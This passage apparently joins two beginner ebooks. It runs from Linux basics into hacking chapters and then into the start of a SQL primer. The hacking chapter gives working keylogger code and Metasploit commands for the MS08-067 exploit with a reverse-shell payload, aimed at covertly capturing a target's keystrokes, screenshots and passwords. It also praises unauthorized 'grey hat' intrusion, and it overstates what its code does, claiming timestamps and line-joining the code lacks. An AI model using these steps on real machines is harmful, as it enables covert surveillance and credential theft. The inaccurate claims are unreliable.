new group and assigns it the next available GID from the group range
defined in the /etc/login.defs file.
You can specify a GID by using the option -g GID
[student@desktop ~]$ sudo groupadd -g 5000 ateam
The -r option will create a group that is system specific and assign it a
GID belonging to the system range, which is defined in the /etc/login.defs
file.
[student@desktop ~]$ sudo groupadd -r professors
● The groupmod command is used to modify the parameters of an existing
group, such as the mapping of the group name to the GID. The -n option is
used to give the group a new name.
[student@desktop ~]$ sudo groupmod -n professors lecturers
The -g option is passed along with the command if you want to assign a
new GID to the group.
[student@desktop ~]$ sudo groupmod -g 6000 ateam
After entering this command, you will see a list of files that appears like this
example:
Take note that there are numerous programs that are set with a suid
permission because they require it. However, you may want to check the
entire list to make sure that there are no programs that have odd suid
permissions. For example, you may not want to have suid programs located
in your home directory.
Here is an example: typing ls -l /bin/su will give you the following
result:
The character s in the permission setting allotted to the owner (it appears
as -rws) shows that the file /bin/su has the suid permission. This means
that the su command, which allows any user to obtain superuser privileges,
can be run by anyone.
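You can experiment with the suid bit safely on a scratch file of your own, and use find to hunt for suid files under a path; the directory below is invented, and a real audit would usually scan from /:

```shell
mkdir -p /tmp/suid_demo
touch /tmp/suid_demo/myprog
chmod u+s,a+x /tmp/suid_demo/myprog   # set suid on our own scratch file

ls -l /tmp/suid_demo/myprog           # permissions start with -rws
find /tmp/suid_demo -perm -4000       # lists files with the suid bit set
```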
Chapter 12 Some Basic Hacking with Linux
Now that you have hopefully gotten used to the Linux system and have some
ideas of how it works and such, it is a good time to learn a little bit about
hacking with Linux. Whether you are using this system on your own or you
have it set up with a network of other people, there are a few types of hacking
that you may find useful to know how to do. This chapter is going to spend
some time exploring some basic hacking endeavors on the Linux system.
We want to spend some time looking at how we can work with the Linux
system to help us complete some of the ethical hacking that we would like to
do. While we are able to do some hacking with the help of Windows and
Mac, often, the best operating system to help us out with all of this is going to
be the Linux operating system. It already works on the command line, which
makes things a bit easier and will have all of the protection that you need as
well. And so, we are going to spend a bit of our time taking a closer look at
how the Linux system is going to be able to help us out with some of the
hacking we want to accomplish.
There are a lot of reasons that hackers are going to enjoy working with Linux
over some of the other operating systems that are out there. The first benefit
is that it is open source. This means that the source code is right there and
available for you to use and modify without having to pay a lot of fees or
worry that it is going to get you into trouble. This open-source also allows
you to gain more access to it, share it with others and so much more. And all
of these can be beneficial to someone who is ready to get started with
hacking as well.
The compatibility that comes with Linux is going to be beneficial for a
hacker as well. This operating system is going to be unique in that it is going
to help us support all of the software packages of Unix and it is also able to
support all of the common file formats that are with it as well. This is
important when it comes to helping us to work with some of the hacking
codes that we want to do later on.
Linux is also designed to be fast and easy to install. There are a number of
steps that we had to go through in order to get started. But when compared to
some of the other operating systems this is not going to be that many and it
can really help you to get the most out of this in as little time as possible.
You will quickly notice that most of the distributions that you are able to do
with Linux are going to have installations that are meant to be easy on the
user. And also, a lot of the popular distributions of Linux are going to come
with tools that will make installing any of the additional software that you
want as easy and friendly as possible too. Another thing that you might notice
with this is that the boot time of the operating system of Linux is going to be
faster than what we see with options like Mac and Windows, which can be
nice if you do not want to wait around all of the time.
When you are working on some of the hacks that you would like to
accomplish, the stability of the program is going to matter quite a bit. You do
not want to work with a system that is not all that stable, or that is going to
fall apart on you in no time. Linux is not going to have to go through the
same periodic reboots like others in order to maintain the level of
performance that you would like and it is not going to slow down or freeze up
over time if there are issues with leaks in the memory and more. You are also
able to use this operating system for a long time to come, without having to
worry about it slowing down or running into some of the other issues that the
traditional operating systems will need to worry about.
For someone who is going to spend their time working with ethical hacking,
this is going to be really important as well. It will ensure that you are able to
work with an operating system that is not going to slow down and cause
issues with the protections that you put in place on it. And you will not have
to worry about all of the issues that can come up with it being vulnerable and
causing issues down the line as well. It is going to be safe and secure along
the way, so that you are able to complete your hacks and keep things safe,
without having to worry about things not always working out the way that we
would hope.
Another benefit that we will spend a bit of time on is how friendly the Linux
network is overall. Because this operating system is open source and
developed collaboratively over the internet, it is also able to
manage networking processes effectively. And it is going
to help with things like commands that are easy to learn and lots of libraries
that can be used in a network penetration test if you choose to do this. Add on
that the Linux system is going to be more reliable and it is going to make the
backup of the network more reliable and faster and you can see why so many
users love to work with this option.
As a hacker, you will need to spend some of your time multitasking to get all
of the work done. A lot of the codes and more that you want to handle in
order to do a hack will need to have more than one thing going at a time, and
Linux is able to handle all of this without you having to worry about too
much going on or the computer freezing upon you all of the time.
In fact, the Linux system was designed in order to do a lot of things at the
same time. This means that if you are doing something large, like finishing
up a big printing job in the background, it is not really going to slow down
some of the other work that you are doing. Plus, when you need to handle
more than one process at the same time, it is going to be easier to do on
Linux, compared to Mac or Windows, which can be a dream for a hacker.
You may also notice that working with the Linux system is a bit different and
some of the interactions that you have to take care of are not going to be the
same as what we found in the other options. For example, the command-line
interface is going to introduce us to something new. Linux operating systems
are going to be specifically designed around a strong and highly integrated
command-line interface, something that the other two operating systems are
not going to have. The reason that this is important is that it will allow
hackers and other users of Linux to have more access and even more control,
over their system.
Next on the list is the fact that the Linux system is lighter and more portable
than we are going to find with some of the other operating systems out there.
This is a great thing because it provides hackers with a method that
makes it easier to customize the live boot disks and drives from any
distribution of Linux that they would like. The installation is going to be fast
and it will not consume as many resources in the process. Linux is light-
weight and easy to use while consuming fewer resources overall.
The maintenance is going to be another important feature that we need to
look at when we are trying to do some ethical hacking and work with a good
operating system. Maintaining the Linux operating system is going to be easy
to work with. All of the software is installed in an easy manner that does not
take all that long and every variant of Linux has its own central software
repository, which makes it easier for the users to search for their software and
use the kind that they would like along the way.
There is also a lot of flexibility when it comes to working with this kind of
operating system. As a hacker, you are going to need to handle a lot of
different tools along the way. And one of the best ways that we are able to do
this is to work with an operating system that allows for some flexibility in the
work that we are doing. This is actually one of the most important features in
Linux because it allows us to work with embedded systems, desktop
applications and high-performance server applications as well.
As a hacker, you want to make sure that your costs are as low as possible. No
one wants to get into the world of ethical hacking and start messing with
some of those codes and processes and then find out that they have to spend
hundreds of dollars in order to get it all done. And this is where the Linux
system is going to come into play. As you can see from some of our earlier
discussions of this operating system, it is going to be an open-source
operating system, which means that we are able to download it free of cost.
This allows us to get started with some of the hacking that we want to do
without having to worry about the costs.
If you are working with ethical hacking, then your main goal is to make sure
that your computer and all of the personal information that you put into it is
going to stay safe and secure all of the time. This will help keep other
hackers out and will make it so that you don't have to worry about your
finances or other issues along the way, either. And this is
also where the Linux operating system is going to come into play to help us
out.
One of the nice things that we are going to notice when it comes to the Linux
operating system is that it is seen as being less vulnerable than some of the
other options. Today, most of the operating systems that we are able to
choose from, besides the Linux option, are going to have a lot of
vulnerabilities to an attack from someone with malicious intent along the
way.
Linux, on the other hand, seems to have fewer of these vulnerabilities in
place from the beginning. This makes it a lot nicer to work with and will
ensure that we are going to be able to do the work that we want on it, without
having a hacker get in. Linux is seen as one of the most secure of all the
operating systems that are available and this can be good news when you are
starting out as an ethical hacker.
The next benefit that we are going to see when it comes to working with the
Linux operating system over some of the other options, especially if you are a
hacker, is that it is going to provide us with a lot of support and works with
most of the programming languages that you would choose to work on when
coding. Linux is already set up in order to work with a lot of the most popular
programming languages. This means that options like Perl, Ruby, Python,
PHP, C++, and Java are going to work great here.
This is good news for the hacker because it allows them to pick out the option
that they like. If you already know a coding language or there is one in
particular that you would like to use for some of the hacking that you plan to
do, then it is likely that the Linux system is going to be able to handle this
and will make it easy to use that one as well.
If you want to spend some of your time working on hacking, then the Linux
system is a good option. And this includes the fact that many of the hacking
tools that we are working with are going to be written out in Linux. Popular
hacking tools like Nmap and Metasploit, along with a few other options, are
going to be ported for Windows. However, you will find that while they can
work with Windows, if you want, you will miss out on some of the
capabilities when you transfer them off of Linux.
It is often better to leave these hacking tools on Linux. This allows you to get
the full use of all of them and all of the good capabilities that you can find
with them, without having to worry about what does and does not work if you
try to move them over to a second operating system. These hacking tools
were made and designed to work well in Linux, so keeping them there and
not trying to force them into another operating system allows you to get the
most out of your hacking needs.
And finally, we are able to take a quick look at how the Linux operating
system is going to take privacy as seriously as possible. In the past few years,
there was a lot of information on the news about the privacy issues that
would show up with the Windows 10 operating system. Windows 10 is set up
to collect a lot of data on the people who use it the most. This could bring up
some concerns about how safe your personal information could be.
This is not a problem when we are working with Linux. This system is not
going to take information, you will not find any talking assistants to help you
out and this operating system is not going to be around, collecting
information and data on you to have some financial gain. This all can speak
volumes to an ethical hacker who wants to make sure that their information
stays safe and secure all of the time.
As you can see here, there are a lot of benefits that are going to show up
when it is time to work with the Linux system. We can find a lot of examples
of this operating system and all of the amazing things that it is able to do,
even if we don’t personally use it on our desktop or laptop. The good news is
that there are a lot of features that are likely to make this operating system
more effective and strong in the future, which is perfect when it comes to
doing a lot of tasks, including the hacking techniques that we talked about.
Making a key logger
The first thing we are going to learn how to work with is a key logger. This
can be an interesting tool because it allows you to see what keystrokes
someone is making on your computer right from the beginning. Whether you
have a network that you need to keep safe and you want to see what others
on the system are typing out, or if you are using a type of black hat hacking
and are trying to get the information for your own personal use, the key
logger is one of the tools that you can use to make this work out easily for
you.
Now there are going to be a few different parts that you will need to add in
here. You can download a key logger library online (pyxhook, used in the
example below, is a popular one on Linux for beginners), and while this is
going to help you to get all the
characters that someone is typing on a particular computer system, it is not
going to be very helpful. Basically here you are going to get each little letter
on a different line with no time stamps or anything else to help you out.
It is much better to work this out so that you are getting all the information
that you need, such as lines of text rather than each letter on a different line
and a time stamp to tell you when each one was performed. You can train the
system to only stop at certain times, such as when there is a break that is
longer than two seconds, and it will type in all the information that happens
with the keystrokes at once rather than splitting it up. A time stamp is going
to make it easier to see when things are happening and you will soon be able
to see patterns, as well as more legible words and phrases.
When you are ready to bring all of these pieces together, here is the code that
you should put into your command prompt on Linux in order to get the key
logger all set up:
import pyxhook
# change this to your log file's path
log_file = '/home/aman/Desktop/file.log'
# this function is called every time a key is pressed
def OnKeyPress(event):
    fob = open(log_file, 'a')
    fob.write(event.Key)
    fob.write('\n')
    if event.Ascii == 96:  # 96 is the ASCII value of the grave (`) key
        fob.close()
        new_hook.cancel()
# instantiate the HookManager class
new_hook = pyxhook.HookManager()
# listen to all keystrokes
new_hook.KeyDown = OnKeyPress
# hook the keyboard
new_hook.HookKeyboard()
# start the session
new_hook.start()
Now you should be able to get a lot of the information that you need in order
to keep track of all the key strokes that are going on with the target computer.
You will be able to see the words come out in a steady stream that is easier to
read, you will get some time stamps, and it shouldn’t be too hard to figure out
where the target is visiting and what information they are putting in. Of
course, this is often better when it is paired with a few other options, such as
taking screenshots and tracking where the mouse of the target computer is
going in case they click on links or don’t type in the address of the site they
are visiting, and we will explore that more now!
Getting screenshots
Now, you can get a lot of information from the key strokes, but often these
are just going to end up being random words with time stamps accompanying
them. Even if you are able to see the username and password that you want, if
the target is using a link in order to get their information or to navigate to a
website, how are you supposed to know where they are typing the
information you have recorded?
While there are a few codes that you can use in order to get more information
about what the target is doing, getting screenshots is one of the best ways to
do so. This helps you to not only get a hold of the username and passwords
based on the screenshots that are coming up, but you are also able to see what
the target is doing on the screen, making the hack much more effective for
you.
Don’t worry about this sounding too complicated. The code that you need to
make this happen is not too difficult and as long as you are used to the
command prompt, you will find that it is pretty easy to get the screenshots
that you want. The steps that you need to take in order to get the screenshots
include:
Step1: set the hack up
First, you will need to select the kind of exploit that you need to use. A good
exploit that you should consider using is the MS08_067_netapi exploit. You
will need to get this one onto the system by typing:
msf > use exploit/windows/smb/ms08_067_netapi
Once this is on the system, it is time to add in a process that is going to make
it easier to simplify the screen captures. Metasploit's Meterpreter
payload can make things easier to do. In order to get this set up and loaded
into your exploit, you will need to type in the following code:
msf> (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp
The following step is to set up the options that you want to use. A good place
to start is with the show options command. This command is going to let you
see the options that are available and necessary if you would like to run the
hack. To get the show options command to work well on your computer, you
will need to type in the following code:
msf > (ms08_067_netapi) show options
At this point, you should be able to see the victim, or the RHOST, and the
attacker or you, the LHOST, IP addresses. These are important to know when
you want to take over the system of another computer because their IP
address will let you get right there. The two commands that you will need in
order to set your IP address and the target's IP address so that you can take
over the target's system are:
msf > (ms08_067_netapi) set RHOST 192.168.1.108
msf > (ms08_067_netapi) set LHOST 192.168.1.109
Now if you have gone through and done the process correctly, you should be
able to exploit into the other computer and put the Meterpreter onto it. The
target computer is going to be under your control now and you will be able to
take the screenshots that you want with the following steps.
Step 2: Getting the screenshots
With this step, we are going to work on getting the screenshots that you want.
But before we do that, we want to find out the process ID, or the PID, that
you are using. To do this, you will need to type in the code:
meterpreter > getpid
The screen that comes up next is going to show you the PID that you are
using on the target's computer. For this example we are going to have a PID
of 932, but it is going to vary based on what the target's computer is saying.
Now that you have this number, you will be able to check which process this
is by getting a list of all the processes with the corresponding PIDs. To do
this, you will just need to type in:
meterpreter > ps
When you look at the PID 932, or the one that corresponds to your target's
particular system, you will be able to see that it corresponds with
the process known as svchost.exe. Since you are going to be using a
process that has active desktop permissions in this case, you will be ready to
go. If you don’t have the right permissions, you may need to do a bit of
migration in order to get the active desktop permissions. Now you will just
need to activate the built in script inside of Meterpreter. The script that you
need is going to be known as espia. To do this, you will simply need to type
out:
meterpreter > use espia
Running this script is just going to install the espia app onto the computer of
your target. Now you will be able to get the screenshots that you want. To get
a single screenshot of the target computer, you will simply need to type in the
code:
meterpreter > screengrab
When you type out this code, the espia script is
basically going to take a screenshot of what the target's computer is doing at
the moment, and then save it to the root user's directory. You will then
be able to see a copy of it come up on your own computer. You can
take a look at what is going on, and if you did this in the proper way, the
target will not know that you took the screenshots or that you
are even there. You can keep track of what is going on and take as
many of the different screenshots that you would like.
These screenshots are pretty easy to set up and they are going to make it
easier than ever to get the information that you need as a hacker. You will not
only receive information about where the user is heading to, but also what
information they are typing into the computer.
Keep in mind that black hat hacking is usually illegal and it is not encouraged
in any way. While the black hat hackers would use the formulas above in
order to get information, it is best to stay away from using these tactics in an
illegal manner. Learning these skills however can be a great way to protect
yourself against potential threats of black hat hackers. Also, having hacking
skills allows you to detect security threats in the systems of other people.
Being a professional hacker can be a highly lucrative career, as big
companies pay a lot of money to ensure that their systems are secure. Hack-
testing systems for them is a challenging and fun way to make a living for
the skilled hackers out there!
Chapter 13 Types of Hackers
All lines of work in society today have different forms. You are either blue
collar, white collar, no collar…whatever. Hacking is no different. Just as
there are different kinds of jobs associated with different kinds of collar colors,
the same goes for hacking.
Hackers have been classified into many different categories, black hat, white
hat, grey hat, newbies, hacktivists, elites, and more. Now, to help you gain a
better understanding as to what grey hacking is, let’s first take a look at these
other kinds of hacking, so you can get a feel for what it is hackers do, or can
do, when they are online.
Newbies
The best place to start anything is at the beginning, which is why we are
starting with the newbie hackers.
The problem with a lot of newbie hackers is that they think they have it all
figured out when they really don’t. The idea of hacking is really only
scratching the surface when it comes to everything that is involved, and it is
not at all uncommon for people who want to get into it to get overwhelmed
when they see what really needs to be learned.
Don’t let that discourage you, however; you are able to learn it all, it just
takes time and effort on your part. Borrow books and get online. Look up
what needs to be learned and remember it. Don’t rush yourself. You need to learn,
and really learn. Anything that you don’t remember can end up costing you
later.
There are immediate reactions when it comes to the real world of hacking,
and sitting there trying to look up what you should have already known is not
going to get you far as a hacker. If you want to be good at what you do, then
take the time required to be good at it.
Don’t waste your time if you don’t think you really want to learn it, because
it is going to take a lot of your concentration to get to the heart of the matter.
Don’t get me wrong, it is more than worth it, but if you are only looking into
it for curiosity’s sake, don’t do it unless knowing really means that much to
you.
Sure there are those that kind of know what they are doing, or they can get
into their friend’s email account, but that is not the hacking I am talking
about here.
I want you to become a real life, capable hacker, and that isn’t going to
happen unless you are willing to take the time needed to learn it, and put
forth the effort to learn it.
You have to remember that every hacker in existence had to start as a
newbie hacker and build up their skills from there. Now, how fast they built
those skills depended greatly on how much time and effort they put into
working on it, but don’t worry, you will get the hang of things, and while you
have to start as a newbie, you will have Grey Hat status soon enough.
Elites
As with the newbie hackers, elite hackers can be any kind of hacker, whether
that be good or bad. What makes them elite is the fact they are good at what
they do, and they know it.
There is a lot of respect for elite hackers online. Just like with elite anything,
they know what they are doing, and they know that others can’t challenge
them unless they too know how to handle themselves.
There is a level of arrogance that goes with the status, but it is well deserved.
Anyone can stop at second best, but it takes true dedication to reach the top.
An elite hacker can use their powers for good or bad, but they are a force to
be reckoned with either way. They know the way systems work, how to work
around them, and how to get them to do what they want them to do.
If you have a goal of becoming an elite hacker, you do have your work cut
out for you, but don’t worry, you will get there. It only takes time and effort
to get this top dog status, and it comes to those who want it.
No one ‘accidentally’ achieves elite status; it is something that they had to
work for, but it is definitely worth all of the time and effort that is put into it.
As an elite hacker, you won’t have to worry about whatever system you run
into, you will know what is coming, and how you can work around it, it just
comes with the line of work.
Hacktivists
Hacktivist hackers use their skills to promote a social or political agenda.
Sometimes they are hired by specific groups to get into places online and
gather information, sometimes they work all on their own.
The point of this kind of hacking is to make one political party look bad, and
the one that the hacker promotes to look good.
Then, they either publish it elsewhere online, or they pass it along so others
can see what the person has done or what they are accused of doing. It is a
way for politicians to make jabs at each other, and it isn’t really playing the
game fairly.
The hacker then is either paid by the party that hired them, or, if they are
working for themselves, they get to see the results of what they posted about
the politician.
The list of hackers and what they do is one that goes on and on, but they all
can ultimately fit into three categories, being the black hat, white hat, and
grey hats. No matter what kind of hacker they are on top of it, these are the
three realms that are really all encompassing.
This is because these are not only categories of hackers in and of themselves, but they are
also characteristics of every kind of hacker out there. Whether they are doing
things for good, for bad, or doing good things without permission, these are
really what hacking comes down to.
a. Black hat
The black hat hacker is likely the most famous of the hacking world, or
rather, infamous. This is the line of hacking that movies tend to focus on, and
it is the line of hacking that has given all hacking a bad name.
A black hat hacker is a hacker that is getting into a system or network to
cause harm. They always have malicious intent, and they are there to hurt and
destroy. They do this by either stealing things, whether it be the person’s
information, the network’s codes, or anything else they find that is valuable
to them, or they can do it by planting worms and viruses into the system.
There have been viruses planted into various systems throughout history,
causing hundreds of thousands of dollars’ worth of damage, and putting
systems down for days.
Viruses are programs that hackers create and then distribute, and they wreak havoc on
whatever they can get a grip on. They oftentimes disguise themselves to look
like one thing, and they prompt you to open them in whatever way they can.
Then, once you do open the link, they get into the hard drive of your system
and do whatever they want while they are in there. Many viruses behave as if
they have a mind of their own, and you would be surprised at the harm they
can cause.
There is a certain kind of virus, known as a ‘backdoor’ virus, which allows its
sender to then have access to and control of whatever system it has planted
itself into. It is as though the person who owns the system is nothing more
than a bystander who can do nothing but watch as the virus takes its toll on
the system.
Hackers will use these viruses for a number of reasons, and none of them are
very good for you. When a hacker has access to your computer, they can then
do whatever they like on there.
They can get into your personal information, and use that for their own gain.
They can steal your identity, they can do things that are illegal while they are
on your computer, and thus make it look like you were the one who did it,
and get out of the suspicion by passing all the blame onto you.
These are really hard viruses to get rid of, and it is of utmost importance that
you do whatever you can to protect yourself at the outset, to make sure you
don’t get one of these viruses. However, if you do happen to get one, there is
hope. You may have to get rid of a lot of your system, or shut it down and
restart it entirely, but it is always better to do that than to let a hacker have
access to anything you are doing.
Black hat hackers are malicious. They only do what they do to harm others
and cause mischief. It is unfortunate that they do what they do, as this is what
made hacking fall under a bad light, but there is hope, because wherever there
is a bad thing, there is also some good to be found, and that good comes in
the form of the white and grey hat hackers.
b. White hat
The white hat hacker and the grey hat hacker are really similar, but there are
key differences that make them separate categories. The white hat hacker is a
person who is hired by a network or company to get into the system and
intentionally try to hack it.
The purpose of this is to test the system or network for weakness. Once they
are able to see where hackers can get in, they can fix it and make it more
difficult for the black hat hackers to break in.
They often do this through a form of testing known as Penetration Testing,
but we will look more on that later. White hat hackers always have
permission to be in the system they are in, and they are there for the sole
purpose of looking for vulnerabilities.
There is a high enough demand for this line of work that there are white hat
hackers who do it as a full-time job. The more systems go up, the more
hackers are going to try to break into them. And the more hackers that try to do
that, the more companies are going to need white hat hackers to keep them
out.
Companies aren’t too picky about who they hire to work for them, either, so it is
remarkable that so many hackers still choose to go down the black hat path.
They could be making decent wages by working for people and getting paid
for what they do, but unfortunately not many people see it this way, and they
would rather hack for their own selfish gain than do what would help
others.
To put it simply, however, it can be broken down to a very basic relationship.
Black hackers try to get in, white hackers try to keep them out. Sometimes
the black hats have the upper hand, then there are times when it goes to the
whites.
It is like a codependent relationship of villain and super hero, where you are
rooting for one but the other still manages to get what they want every once
in a while.
It is a big circle that works out in the end. Of course it would be a lot easier if
black hat hackers would stop breaking into the systems in the first place, but
unfortunately that isn’t going to happen.
c. Grey hat
The world is often portrayed as being full of choices that are either right or
wrong. You can do it one way, or you can do it any way but that one right
way…thus making you wrong.
Right and wrong, black and white. Yet…what about those exceptions to the
rule? There is an exception to pretty much every rule in existence, and
hacking is no exception. Grey hat hackers fall into this realm.
Whether they are right to do what they do or wrong to do what they do is up
to the individual to decide, because it is a grey area.
To clarify what I mean, think about it this way. Black hat hackers get into
networks without permission to cause harm. That is bad. Very bad. White hat
hackers get into systems with permission to cause protection. That is good.
Very good.
But then you have the grey hat hackers. Grey hat hackers get into a system
without permission…which is bad, but they get into that system to help the
company or network…which is good.
So, in a nutshell, grey hat hackers use bad methods to do good things. Which,
in turn, should make the whole event a good thing. Many people feel that it is
the grey hat hackers that do the best job of keeping the black hat hackers at
bay, but there are still those that argue the grey hats should not do what they
do because they have no permission to do it.
What is important and universal is the fact that a grey hat hacker never does
anything malicious or bad to a system, in fact, they do every bit as good as
the white hat hackers for those who are in charge of the network, but they do
it for free.
In a way, the grey hat hackers can be considered the Robin Hoods of hacking,
doing what they can to help people, unasked, unpaid, and largely without
even a ‘thank you’.
Conclusion
So you’ve worked through my book. Congratulations! You have learnt all
you need to learn to become a perfect Linux command line ninja. You have
acquired powerful and really practical skills and knowledge. What remains is
a little experience. Undoubtedly, your bash scripting is reasonably good now
but you have to practice to perfect it.
This book was meant to introduce you to Linux and the Linux command line
right from scratch, to teach you what you need to know to use it properly, and a
bit more to take you to the next level. At this point, I can say that you are on
your way to doing something great with bash, so don’t hang up your boots just
yet.
The next step is to download Linux (if you haven’t done so yet) and get
started with programming for it! The rest of the books in this series will be
dedicated to more detailed information about how to do Linux programming,
so for more high-quality information, make sure you check them out.
SQL COMPUTER PROGRAMMING
FOR BEGINNERS:
LEARN THE BASICS OF SQL
PROGRAMMING WITH THIS
STEP-BY-STEP GUIDE IN A
MOST EASILY AND
COMPREHENSIVE WAY FOR
BEGINNERS INCLUDING
PRACTICAL EXERCISE.
JOHN S. CODE
What is a Database?
Database can be said to be a place reserved to store and also process
structured information. Database can also be said to be a systematic
compilation/ collection of data. It is not a rigid platform, information stored
in a Database can also be manipulated, modified or adjusted when the need
arises. Database also supports the retrieval of stored information or data for
further use. Database has many forms that store and organize information
with the use of different structures. In a nutshell, data management becomes
easy with databases.
For instance, an online telephone directory would certainly use a database to store
data pertaining to phone numbers, people, and other contact details.
Likewise, an electricity service provider needs a database to manage billing
and other client-related concerns. A database also helps to handle
discrepancies in data, among other issues.
Or consider Facebook, the global and far-flung social media platform,
which has a huge number of members and users connected across the world.
A database is needed to store all the information about its users, and to manipulate and
present the data related to them and their online friends. The
database also helps to handle activities such as users’ birthdays and anniversaries,
as well as advertisements, messages, and lots more.
In addition, most businesses depend absolutely on databases for their daily
operation. Complex multinationals need databases to take inventory,
prepare payroll for staff, process orders from clients, and handle transportation, logistics,
and shipping, which often require the tracking of goods. All these operations are
made easy by a well-structured database.
One could go on and on providing innumerable examples of database usage.
What is a Database Management System (DBMS)?
But how can you access the data in your database? That is the function of a
Database Management System (DBMS). A DBMS is a
collection of programs that enables its users to gain access to the
information in the database, manipulate the data, and report or
represent the data. A Database Management System also helps to control
and restrict access to the database.
Database management systems are not a new concept: they were first
implemented in the 1960s. Charles Bachman's Integrated
Data Store (IDS) is regarded as the first ever database management system. Since
then, technology has evolved speedily, and the usage and
functionality of databases have increased immeasurably.
Types of DBMS
There are four different types of DBMS, which are:
Hierarchical DBMS
Network DBMS
Object-Oriented DBMS
Relational DBMS
Hierarchical DBMS - this type is rarely used nowadays and supports a
"parent-child" relationship for storing data.
Network DBMS - this type of DBMS employs many-to-many relationships.
And this usually results in very complex database structures. An example of
this DBMS is the RDM (Raima Database Manager) Server.
Object-Oriented DBMS - this DBMS supports newer data types; the data to be
stored are always in the form of objects. An example of this DBMS is
TORNADO.
Relational DBMS (RDBMS) - this is a type of database management
system that defines database relationships in the form of tables, which are also
known as relations. For instance, in a logistics company with a database that
is designed for the purpose of recording fleet information, you can include
one table that holds a list of employees and another table which
contains the vehicles used by those employees. The two are held separately since
their information is different.
Unlike some other database management systems, such as a Network DBMS, an
RDBMS does not directly support many-to-many relationships (these are usually
modeled through a linking table). Relational database
management systems also do not support arbitrary data types; they have
pre-defined data types which they can support. Even so, the Relational Database
Management System is still the most popular DBMS type in the market
today. Common examples of relational database management systems
include Oracle, MySQL, and Microsoft SQL Server.
A relational database is built from several kinds of objects:
Tables
Indexes
Keys
Constraints
Views
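These objects can all be sketched with a few statements. The following is a minimal example using Python's built-in SQLite driver; the `employees` table, the `idx_dept` index, and the `it_staff` view are made-up names for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# Table with a key (PRIMARY KEY) and a constraint (NOT NULL)
cur.execute("""
    CREATE TABLE employees (
        id INTEGER PRIMARY KEY,
        name TEXT NOT NULL,
        department TEXT
    )
""")

# Index: speeds up lookups by department
cur.execute("CREATE INDEX idx_dept ON employees(department)")

# View: a stored query that behaves like a read-only table
cur.execute("""
    CREATE VIEW it_staff AS
    SELECT name FROM employees WHERE department = 'IT'
""")

cur.execute("INSERT INTO employees (name, department) VALUES ('Ada', 'IT')")
print(cur.execute("SELECT name FROM it_staff").fetchall())  # [('Ada',)]
```

The view is worth noting: it stores the query itself, not a copy of the data, so it always reflects the current contents of the table.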
Popular Relational Database Management Systems
There are some popular relational database management systems, and they
will be discussed in this chapter.
1. MySQL
This is the most popular open source SQL database, usually used for the
development of web applications. Its main benefits are that it is reliable,
inexpensive, and easy to use, so it has been adopted by a broad
community of developers over the years. MySQL has been in use since
1995.
One of its disadvantages, however, is that it lacks some recent
features that most advanced developers would like to use for better
performance. It also scales poorly, and open source
development has lagged since MySQL was taken over by Oracle.
2. PostgreSQL
This is an open source SQL database that is independent of any
corporation. It is also used mainly for the development of web applications.
Some of the advantages of PostgreSQL over MySQL are that it is easy to
use, cheap, and used by a wide community of developers. In addition, foreign
key support is one of the special features of PostgreSQL, and it does not
require complex configuration.
On the other hand, it is less popular than MySQL, which makes it harder to
find hosting and support for, and it can be slower than MySQL.
3. Oracle DB
The code for Oracle Database is not open source. It is owned by Oracle
Corporation. It is the database employed by many multinationals around the
world, especially top financial institutions such as banks. This is because it
offers a powerful combination of comprehensive technology and pre-
integrated business applications. It also has some unique functions built in
specifically for banks.
It is not free to use, and it can be very expensive to acquire.
4. SQL Server
This is owned by Microsoft and is not open source. It is mostly used by
large enterprises and multinationals. There is a free version, called Express,
where you can test the features, but for bigger workloads it becomes
expensive to use.
5. SQLite
This is a very popular open source SQL database. It can store an
entire database in just one file. A major advantage of SQLite is
its ability to save or store data locally without needing a server.
It is a popular choice for databases in cellphones, MP3 players, PDAs,
set-top boxes, and other electronic gadgets.
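That single-file design is easy to see in practice. In this small sketch (the `songs.db` file name is arbitrary), the whole database is created, written to, and left behind as one ordinary file on disk:

```python
import os
import sqlite3
import tempfile

# The database lives in one regular file; no server process is involved.
path = os.path.join(tempfile.mkdtemp(), "songs.db")

conn = sqlite3.connect(path)  # creates the file if it does not exist
conn.execute("CREATE TABLE songs (title TEXT)")
conn.execute("INSERT INTO songs VALUES ('Track 1')")
conn.commit()
conn.close()

print(os.path.exists(path))  # True: the entire database is this one file
```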
Chapter 2 SQL Basics
SQL (Structured Query Language) is a special language used to define data, provide access to data, and
process it. SQL is a nonprocedural language: it only
describes the necessary components (for example, tables) and the desired
results, without specifying how those results should be
obtained. Each SQL implementation is a layer on top of the database engine,
which interprets SQL statements and determines the order of accessing the
database structures for the correct and efficient formation of the desired
result.
How Does SQL Work with Databases?
To process the request, the database server translates SQL commands into
internal procedures. Due to the fact that SQL hides the details of data
processing, it is easy to use.
You can use SQL to help out in the following ways:
SQL helps when you want to create tables based on the data
you have.
SQL can store the data that you collect.
SQL can look at your database and retrieve the information
stored there.
SQL allows you to modify data.
SQL can take some of the structures in your database and
change them up.
SQL allows you to combine data.
SQL allows you to perform calculations.
SQL allows data protection.
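Most of the capabilities above can be sketched in a few lines. The following example runs SQL against an in-memory SQLite database from Python; the `sales` table and its columns are invented purely for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# Create a table based on the data you have
cur.execute("CREATE TABLE sales (item TEXT, amount REAL)")

# Store the data that you collect
cur.executemany("INSERT INTO sales VALUES (?, ?)",
                [("pen", 2.5), ("pad", 4.0)])

# Modify data already in the table
cur.execute("UPDATE sales SET amount = 3.0 WHERE item = 'pen'")

# Perform a calculation over the stored rows
total = cur.execute("SELECT SUM(amount) FROM sales").fetchone()
print(total[0])  # 7.0
```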
Traditionally, many companies would choose to work with the ‘Database
Management System,’ or the DBMS to help them to keep organized and to
keep track of their customers and their products. This was the first option that
was on the market for this kind of organization, and it does work well. But
over the years there have been some newer methods that have changed the
way that companies can sort and hold their information. Even when it comes
to the most basic management system for data that you can choose, you will
see that there is a ton more power and security than you would have found in
the past.
Big companies will be responsible for holding onto a lot of data, and some of
this data will include personal information about their customers like address,
names, and credit card information. Because of the more complex sort of
information that these businesses need to store, a new ‘Relational Database
Management System’ has been created to help keep this information safe in a
way that the DBMS has not been able to.
Now, as a business owner, there are some different options that you can pick
from when you want to get a good database management system. Most
business owners like to go with SQL because it is one of the best options out
there. The SQL language is easy to use, was designed to work well with
businesses, and it will give you all the tools that you need to make sure that
your information is safe. Let’s take some more time to look at this SQL and
learn how to make it work for your business.
How this works with your database
If you decide that SQL is the language that you will work on for managing
your database, you can take a look at the database. You will notice that when
